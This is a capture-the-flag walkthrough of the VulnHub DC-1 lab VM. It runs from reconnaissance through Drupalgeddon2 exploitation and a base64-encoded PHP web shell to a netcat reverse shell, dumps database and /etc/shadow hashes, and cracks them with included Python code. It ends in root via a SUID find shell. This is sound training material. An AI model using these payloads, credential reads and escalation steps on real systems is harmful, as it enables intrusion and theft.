VulnHub DC1
12 April, 2021
Machine Link: https://www.vulnhub.com/entry/dc-1,292/
Beginning with an nmap scan of ports 1-20000; -A turns on version detection, OS fingerprinting, the default NSE scripts and traceroute:
$ sudo nmap -A -p 1-20000 192.168.56.116
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for 192.168.56.116
Host is up (0.0013s latency).
Not shown: 19997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33063/udp status
| 100024 1 34985/udp6 status
| 100024 1 43805/tcp status
|_ 100024 1 52163/tcp6 status
MAC Address: 08:00:27:18:34:12 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.25 ms 192.168.56.116
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.95 seconds
A Drupal 7 site served by Apache 2.2.22 on Debian (the Drupal 7 x-generator header and the robots.txt entries give it away). I checked every path listed in robots.txt; none of them revealed anything useful, and CHANGELOG.txt, which would have pinned the exact 7.x release, is not present (the exploit output further down confirms the 404).
Next I performed a nikto scan
$ nikto -host http://192.168.56.116
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.116
+ Target Hostname: 192.168.56.116
+ Target Port: 80
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Retrieved x-powered-by header: PHP/5.4.45-0+deb7u14
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 152289, size: 1561, mtime: Wed Nov 20 15:45:59 2013
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-39272: /misc/favicon.ico file identifies this app/server as: Drupal 7.x
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /web.config: ASP config file is accessible.
I moved on to rpcbind on port 111, but again nothing significant: only the portmapper itself and rpc.statd (program 100024, the NFS lock-status daemon) are registered, with no mountd or nfs program, so there is no NFS export to look at.
$ rpcinfo 192.168.56.116
program version netid address service owner
100000 4 tcp6 ::.0.111 portmapper superuser
100000 3 tcp6 ::.0.111 portmapper superuser
100000 4 udp6 ::.0.111 portmapper superuser
100000 3 udp6 ::.0.111 portmapper superuser
100000 4 tcp 0.0.0.0.0.111 portmapper superuser
100000 3 tcp 0.0.0.0.0.111 portmapper superuser
100000 2 tcp 0.0.0.0.0.111 portmapper superuser
100000 4 udp 0.0.0.0.0.111 portmapper superuser
100000 3 udp 0.0.0.0.0.111 portmapper superuser
100000 2 udp 0.0.0.0.0.111 portmapper superuser
100000 4 local /var/run/rpcbind.sock portmapper superuser
100000 3 local /var/run/rpcbind.sock portmapper superuser
100024 1 udp 0.0.0.0.129.39 status 102
100024 1 tcp 0.0.0.0.171.29 status 102
100024 1 udp6 ::.136.169 status 102
100024 1 tcp6 ::.203.195 status 102
So now I started searching around and found Drupalgeddon2 (CVE-2018-7600, fixed in Drupal 7.58), a remote code execution bug in Drupal's Form API. The drupalgeddon2.rb script exploits it by injecting a render array through the name parameter of the password reset form; the November 2013 file timestamps point to an early 7.x release, well before the fix. It worked and gave me a low-privilege shell as www-data:
# ./drupalgeddon2.rb 192.168.56.116
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://192.168.56.116/
--------------------------------------------------------------------------------
[!] MISSING: http://192.168.56.116/CHANGELOG.txt (HTTP Response: 404)
[!] MISSING: http://192.168.56.116/core/CHANGELOG.txt (HTTP Response: 404)
[+] Found : http://192.168.56.116/includes/bootstrap.inc (HTTP Response: 403)
[+] Header : v7 [X-Generator]
[!] MISSING: http://192.168.56.116/core/includes/bootstrap.inc (HTTP Response: 404)
[!] MISSING: http://192.168.56.116/includes/database.inc (HTTP Response: 403)
[+] Found : http://192.168.56.116/ (HTTP Response: 200)
[+] Metatag: v7.x [Generator]
[!] MISSING: http://192.168.56.116/ (HTTP Response: 200)
[+] Drupal?: v7.x
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[+] Result : Clean URLs enabled
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo YWVKYANZ
[+] Result : YWVKYANZ
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://192.168.56.116/shell.php)
[i] Response: HTTP 404 // Size: 13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell: curl 'http://192.168.56.116/shell.php' -d 'c=hostname'
DC-1>> whoami
www-data
DC-1>> hostname
DC-1
DC-1>> pwd
/var/www
DC-1>> ls -ltrha
total 192K
-rwxr-xr-x 1 www-data www-data 18K Nov 1 2013 LICENSE.txt
-rw-r--r-- 1 www-data www-data 417 Nov 21 2013 xmlrpc.php
-rw-r--r-- 1 www-data www-data 2.2K Nov 21 2013 web.config
-rw-r--r-- 1 www-data www-data 20K Nov 21 2013 update.php
drwxr-xr-x 7 www-data www-data 4.0K Nov 21 2013 themes
drwxr-xr-x 4 www-data www-data 4.0K Nov 21 2013 sites
drwxr-xr-x 2 www-data www-data 4.0K Nov 21 2013 scripts
-rw-r--r-- 1 www-data www-data 1.6K Nov 21 2013 robots.txt
drwxr-xr-x 5 www-data www-data 4.0K Nov 21 2013 profiles
drwxr-xr-x 42 www-data www-data 4.0K Nov 21 2013 modules
drwxr-xr-x 4 www-data www-data 4.0K Nov 21 2013 misc
-rw-r--r-- 1 www-data www-data 703 Nov 21 2013 install.php
-rw-r--r-- 1 www-data www-data 529 Nov 21 2013 index.php
drwxr-xr-x 4 www-data www-data 4.0K Nov 21 2013 includes
-rw-r--r-- 1 www-data www-data 720 Nov 21 2013 cron.php
-rw-r--r-- 1 www-data www-data 6.5K Nov 21 2013 authorize.php
-rw-r--r-- 1 www-data www-data 9.5K Nov 21 2013 UPGRADE.txt
-rw-r--r-- 1 www-data www-data 5.3K Nov 21 2013 README.txt
-rw-r--r-- 1 www-data www-data 8.0K Nov 21 2013 MAINTAINERS.txt
-rw-r--r-- 1 www-data www-data 18K Nov 21 2013 INSTALL.txt
-rw-r--r-- 1 www-data www-data 1.3K Nov 21 2013 INSTALL.sqlite.txt
-rw-r--r-- 1 www-data www-data 1.9K Nov 21 2013 INSTALL.pgsql.txt
-rw-r--r-- 1 www-data www-data 1.5K Nov 21 2013 INSTALL.mysql.txt
-rw-r--r-- 1 www-data www-data 1.5K Nov 21 2013 COPYRIGHT.txt
-rw-r--r-- 1 www-data www-data 5.7K Nov 21 2013 .htaccess
-rw-r--r-- 1 www-data www-data 174 Nov 21 2013 .gitignore
drwxr-xr-x 12 root root 4.0K Feb 19 2019 ..
-rw-r--r-- 1 www-data www-data 52 Feb 19 2019 flag1.txt
drwxr-xr-x 9 www-data www-data 4.0K Apr 12 02:47 .
-rw-r--r-- 1 www-data www-data 75 Apr 12 02:47 shell.php
DC-1>> cat flag1.txt
Every good CMS needs a config file - and so do you.
Following the hint, I found the database credentials in sites/default/settings.php, along with the second flag:
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
The exploit's pseudo-shell sends each command as a separate request to shell.php (system($_REQUEST['c'])), so nothing interactive like the MySQL CLI works through it. I spawned a reverse shell first (listener on 192.168.56.103:4242) and then logged into the MySQL instance; one-off queries could equally have been run from the web shell with mysql -e and the password given on the command line:
$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.116] 42711
www-data@DC-1:/var/www$ mysql -u dbuser -p
mysql -u dbuser -p
Enter password: R0ck3t
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1542
Server version: 5.5.60-0+deb7u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> SHOW DATABASES;
SHOW DATABASES;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
2 rows in set (0.00 sec)
mysql> USE drupaldb;
USE drupaldb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> SHOW TABLES;
SHOW TABLES;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
80 rows in set (0.00 sec)
mysql> SELECT name, mail, pass FROM users;
SELECT name, mail, pass FROM users;
+-------+-------------------+---------------------------------------------------------+
| name | mail | pass |
+-------+-------------------+---------------------------------------------------------+
| | | |
| admin | admin@example.com | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |
| Fred | fred@example.org | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |
| dru | dru@admin.com | $S$D5UnAyJ1hIEF2EmXjYn6bAa2.vNf0KS4alEdkcldvHoKBKvRIcX6 |
+-------+-------------------+---------------------------------------------------------+
4 rows in set (0.00 sec)
While hashcat was chewing on the three Drupal 7 hashes (mode 7900; $S$ marks Drupal's phpass-derived SHA-512 scheme, and the blank first row is Drupal's anonymous user, uid 0, which has no password), I looked at some other tables and found a flag in the node table. The node row only holds the title; the body text lives in field_data_body, keyed by the node id:
mysql> SELECT * FROM node;
SELECT * FROM node;
+-----+------+------+----------+-------+-----+--------+------------+------------+---------+---------+--------+------+-----------+
| nid | vid | type | language | title | uid | status | created | changed | comment | promote | sticky | tnid | translate |
+-----+------+------+----------+-------+-----+--------+------------+------------+---------+---------+--------+------+-----------+
| 1 | 1 | page | und | Main | 2 | 1 | 1550582250 | 1550582250 | 0 | 0 | 0 | 0 | 0 |
| 2 | 2 | page | und | flag3 | 1 | 0 | 1550582412 | 1550583860 | 0 | 0 | 0 | 0 | 0 |
+-----+------+------+----------+-------+-----+--------+------------+------------+---------+---------+--------+------+-----------+
2 rows in set (0.00 sec)
mysql> SELECT * FROM field_data_body WHERE entity_id = 2;
SELECT * FROM field_data_body WHERE entity_id = 2;
+-------------+--------+---------+-----------+-------------+----------+-------+------------------------------------------------------------------------------------------------------------------------------+--------------+---------------+
| entity_type | bundle | deleted | entity_id | revision_id | language | delta | body_value | body_summary | body_format |
+-------------+--------+---------+-----------+-------------+----------+-------+------------------------------------------------------------------------------------------------------------------------------+--------------+---------------+
| node | page | 0 | 2 | 2 | und | 0 | Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow. | | filtered_html |
+-------------+--------+---------+-----------+-------------+----------+-------+------------------------------------------------------------------------------------------------------------------------------+--------------+---------------+
1 row in set (0.00 sec)
flag3's capitalised words (PERMS, FIND, -exec) point at the find command with its -exec option, and "special perms" suggests SUID binaries. Let's check that hypothesis. The exploit's pseudo-shell complains about the > in 2>/dev/null, and the stderr lines at the end of the listing show the redirect was indeed lost, but the command itself still ran:
DC-1>> find / -perm -4000 2>/dev/null
[!] WARNING: Detected an known bad character (>)
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
find: `/proc/3424/task/3424/fd/5': No such file or directory
find: `/proc/3424/task/3424/fdinfo/5': No such file or directory
find: `/proc/3424/fd/5': No such file or directory
find: `/proc/3424/fdinfo/5': No such file or directory
DC-1>> ls -ltrha /usr/bin/find
-rwsr-xr-x 1 root root 159K Jan 6 2012 /usr/bin/find
OK, so find is setuid root: the s in -rwsr-xr-x is the setuid bit and the owner is root, so whatever it runs through -exec executes with root's effective uid. Reading /etc/shadow, which is normally readable only by root, confirms it:
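What find / -perm -4000 is actually testing is the setuid bit in each file's st_mode, where -perm -MODE means "all of MODE's bits are set". The Python below is an added example, not part of the original write-up or of DC-1: it reimplements that walk (handy from a restricted shell or a scripting foothold where find is awkward), filters on owner uid 0 the way you would before consulting GTFOBins, and skips pseudo filesystems to avoid the /proc noise seen above. build_sample_tree() creates a constructed temporary directory with a couple of setuid files for demonstration; the skip list and the file names in the fixture are my choices.

```python
import os
import stat
import tempfile
from typing import Dict, Iterator, Optional, Tuple

# Pseudo filesystems never hold real setuid binaries; walking them only produces the
# "/proc/<pid>/fd/5: No such file or directory" noise seen in the find output above.
SKIP_DIRS = ("/proc", "/sys", "/dev", "/run")


def iter_setuid_files(root: str, bits: int = stat.S_ISUID,
                      owner_uid: Optional[int] = None) -> Iterator[str]:
    """Yield regular files under root whose mode has every bit of `bits` set.

    bits=stat.S_ISUID reproduces `find root -perm -4000`; stat.S_ISGID is -perm -2000
    and S_ISUID | S_ISGID is -perm -6000.  `-perm -MODE` means "all of MODE's bits are
    set", which is why 4000 matches 4755, 4711 and friends.  owner_uid=0 keeps only
    root-owned hits, the ones worth looking up on GTFOBins.
    """
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: judge a symlink by its own mode, as find does
            except OSError:
                continue                     # unreadable entry; this is where find prints an error
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & bits != bits:
                continue
            if owner_uid is not None and st.st_uid != owner_uid:
                continue
            yield path


def describe(path: str) -> str:
    """ls -l style one-liner for a hit, e.g. '-rwsr-xr-x uid=0 /usr/bin/find'."""
    st = os.lstat(path)
    return f"{stat.filemode(st.st_mode)} uid={st.st_uid} {path}"


def build_sample_tree() -> Tuple[str, Dict[str, str], int]:
    """Constructed fixture: a temp dir with a setuid file, a plain file and a nested
    setuid file, all owned by the current user.  Returns (root, paths, owner uid)."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    nested_dir = os.path.join(root, "usr", "bin")
    os.makedirs(nested_dir)
    paths = {"suid": os.path.join(root, "su"),
             "plain": os.path.join(root, "ls"),
             "nested": os.path.join(nested_dir, "find")}
    for p in paths.values():
        open(p, "w").close()
    os.chmod(paths["suid"], 0o4755)          # -rwsr-xr-x
    os.chmod(paths["plain"], 0o755)          # -rwxr-xr-x
    os.chmod(paths["nested"], 0o4755)
    return root, paths, os.getuid()


if __name__ == "__main__":
    import sys
    start = sys.argv[1] if len(sys.argv) > 1 else "/"
    for hit in iter_setuid_files(start, owner_uid=0):
        print(describe(hit))
```

Run with no argument it walks / like the write-up's find command and prints only root-owned setuid binaries; the same list is what you hand to GTFOBins. Note that the filter is on the file's owner, not on who can run it: a setuid binary owned by an unprivileged user is far less interesting than one owned by root.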
DC-1>> find /etc -name "shadow" -exec cat {} \;
root:$6$rhe3rFqk$NwHzwJ4H7abOFOM67.Avwl3j8c05rDVPqTIvWg8k3yWe99pivz/96.K7IqPlbBCmzpokVmn13ZhVyQGrQ4phd/:17955:0:99999:7:::
daemon:*:17946:0:99999:7:::
bin:*:17946:0:99999:7:::
sys:*:17946:0:99999:7:::
sync:*:17946:0:99999:7:::
games:*:17946:0:99999:7:::
man:*:17946:0:99999:7:::
lp:*:17946:0:99999:7:::
mail:*:17946:0:99999:7:::
news:*:17946:0:99999:7:::
uucp:*:17946:0:99999:7:::
proxy:*:17946:0:99999:7:::
www-data:*:17946:0:99999:7:::
backup:*:17946:0:99999:7:::
list:*:17946:0:99999:7:::
irc:*:17946:0:99999:7:::
gnats:*:17946:0:99999:7:::
nobody:*:17946:0:99999:7:::
libuuid:!:17946:0:99999:7:::
Debian-exim:!:17946:0:99999:7:::
statd:*:17946:0:99999:7:::
messagebus:*:17946:0:99999:7:::
sshd:*:17946:0:99999:7:::
mysql:!:17946:0:99999:7:::
flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80:17946:0:99999:7:::
Two sha512crypt hashes ($6$, hashcat mode 1800) to crack, more work for hashcat. flag4's password was found in rockyou.txt instantly:
$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80:orange
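What hashcat does in modes 7900 and 1800, as an added example that is not part of the original write-up: a pure-Python reimplementation of both hash functions, Drupal 7's $S$ scheme (the users.pass column dumped from drupaldb above) and sha512crypt (the $6$ lines from /etc/shadow), plus a small wordlist loop standing in for rockyou.txt. The flag4 line is the one read from /etc/shadow above; the four-word list and the Drupal 7 setting $S$DAbCdEfGh are constructed for the demo and are not the site's real salt or a real wordlist.

```python
import hashlib
from typing import Iterable, Optional

# Drupal's _password_itoa64() and crypt(3)'s b64 table are the same 64-character string.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _emit(out: list, w: int, nchars: int) -> None:
    """Append nchars base64 digits of w, 6 bits at a time, low bits first (phpass and crypt style)."""
    for _ in range(nchars):
        out.append(ITOA64[w & 0x3F])
        w >>= 6


def _drupal_b64(data: bytes) -> str:
    """Drupal 7 _password_base64_encode(): each 3-byte chunk as a little-endian int, k+1 digits per k bytes."""
    out: list = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        _emit(out, int.from_bytes(chunk, "little"), len(chunk) + 1)
    return "".join(out)


def drupal7_hash(password: str, setting: str) -> Optional[str]:
    """Drupal 7 _password_crypt('sha512', ...), hashcat mode 7900.
    The first 12 chars of a stored hash are its setting: '$S$', one ITOA64 char giving
    log2(iterations) ('D' is index 15 -> 32768), then an 8-char salt.  Output is cut to 55 chars."""
    setting = setting[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        return None
    count_log2 = ITOA64.find(setting[3])
    if not 7 <= count_log2 <= 30:        # DRUPAL_MIN_HASH_COUNT .. DRUPAL_MAX_HASH_COUNT
        return None
    salt, pw = setting[4:12].encode(), password.encode()
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _drupal_b64(digest))[:55]


def sha512_crypt(password: str, salt: str, rounds: int = 5000) -> str:
    """crypt(3) $6$ as stored in /etc/shadow (Drepper's SHA-crypt spec), hashcat mode 1800."""
    pw, sl, h = password.encode(), salt.encode()[:16], hashlib.sha512
    b = h(pw + sl + pw).digest()                     # digest B
    a = h(pw + sl)
    for n in range(len(pw), 0, -64):                 # B once per 64 bytes of pw, then the remainder
        a.update(b[:min(n, 64)])
    n = len(pw)
    while n:                                         # bits of len(pw), lowest first: 1 -> B, 0 -> pw
        a.update(b if n & 1 else pw)
        n >>= 1
    a = a.digest()                                   # digest A
    p = (h(pw * len(pw)).digest() * (len(pw) // 64 + 1))[:len(pw)]       # P: DP stretched to len(pw)
    s = (h(sl * (16 + a[0])).digest() * (len(sl) // 64 + 1))[:len(sl)]   # S: DS stretched to len(salt)
    c = a
    for r in range(rounds):                          # the stretching loop
        ctx = h(p if r & 1 else c)
        if r % 3:
            ctx.update(s)
        if r % 7:
            ctx.update(p)
        ctx.update(c if r & 1 else p)
        c = ctx.digest()
    out: list = []                                   # crypt's fixed byte shuffle, 21 triples then byte 63
    for g in range(21):
        i, j, k = g, g + 21, g + 42
        b2, b1, b0 = ((i, j, k), (j, k, i), (k, i, j))[g % 3]
        _emit(out, (c[b2] << 16) | (c[b1] << 8) | c[b0], 4)
    _emit(out, c[63], 2)
    prefix = "$6$" if rounds == 5000 else f"$6$rounds={rounds}$"
    return f"{prefix}{sl.decode()}${''.join(out)}"


def verify(stored: str, password: str) -> bool:
    """Recompute the stored hash with a candidate password and compare."""
    if stored.startswith("$S$"):
        return drupal7_hash(password, stored) == stored
    if stored.startswith("$6$"):
        fields = stored.split("$")                   # ['', '6', ['rounds=N',] salt, hash]
        rounds = 5000
        if fields[2].startswith("rounds="):
            rounds = int(fields[2][len("rounds="):])
            del fields[2]
        return sha512_crypt(password, fields[2], rounds) == stored
    raise ValueError(f"unsupported hash format: {stored[:3]!r}")


def crack(stored: str, candidates: Iterable[str]) -> Optional[str]:
    """First candidate that verifies, or None: a tiny stand-in for hashcat over rockyou.txt."""
    return next((c for c in candidates if verify(stored, c)), None)


# flag4's line from /etc/shadow above.  The word list and the Drupal 7 setting used in
# the demo are constructed; 'AbCdEfGh' is not one of the site's real salts.
FLAG4_SHADOW = ("$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/"
                "eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80")
DEMO_SETTING = "$S$DAbCdEfGh"
WORDLIST = ["password", "123456", "letmein", "orange"]

if __name__ == "__main__":
    print("flag4 ->", crack(FLAG4_SHADOW, WORDLIST))
    demo = drupal7_hash("orange", DEMO_SETTING)
    print(demo, "->", crack(demo, WORDLIST))
```

Running it recovers orange for flag4 from the constructed list, which is the same check hashcat made against rockyou.txt. The cost difference is visible in the code: a Drupal 7 guess costs 2^15 chained SHA-512 calls, several times the work of sha512crypt's default 5000 rounds, which is why the Drupal hashes take longer to crack than the shadow entries.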
Logging in as flag4 over SSH, I found the next flag. Since it said the same method, I searched GTFOBins for a way to get root from a setuid find: find . -exec /bin/sh \; -quit, where -quit stops after the first match so only one shell is spawned. The shell keeps the elevated effective uid because /bin/sh on Debian 7 is dash, which does not drop it; bash would reset euid to the real uid unless started with -p. That is also why id in the session below shows uid=1001 but euid=0:
$ ssh flag4@192.168.56.116
The authenticity of host '192.168.56.116 (192.168.56.116)' can't be established.
ECDSA key fingerprint is SHA256:89B+YqcNl4cSf/BZk26MQG1QeW4BvBlVENMbTRhVhsU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.116' (ECDSA) to the list of known hosts.
flag4@192.168.56.116's password:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
flag4@DC-1:~$ ls -ltrha
total 28K
-rw-r--r-- 1 flag4 flag4 220 Feb 19 2019 .bash_logout
-rw-r--r-- 1 flag4 flag4 675 Feb 19 2019 .profile
-rw-r--r-- 1 flag4 flag4 3.4K Feb 19 2019 .bashrc
-rw-r--r-- 1 flag4 flag4 125 Feb 19 2019 flag4.txt
-rw------- 1 flag4 flag4 28 Feb 19 2019 .bash_history
drwxr-xr-x 2 flag4 flag4 4.0K Feb 19 2019 .
drwxr-xr-x 3 root root 4.0K Feb 19 2019 ..
flag4@DC-1:~$ cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
flag4@DC-1:~$ find . -exec /bin/sh \; -quit
# whoami
root
# id
uid=1001(flag4) gid=1001(flag4) euid=0(root) groups=0(root),1001(flag4)
# cd /root
# ls
thefinalflag.txt
# cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7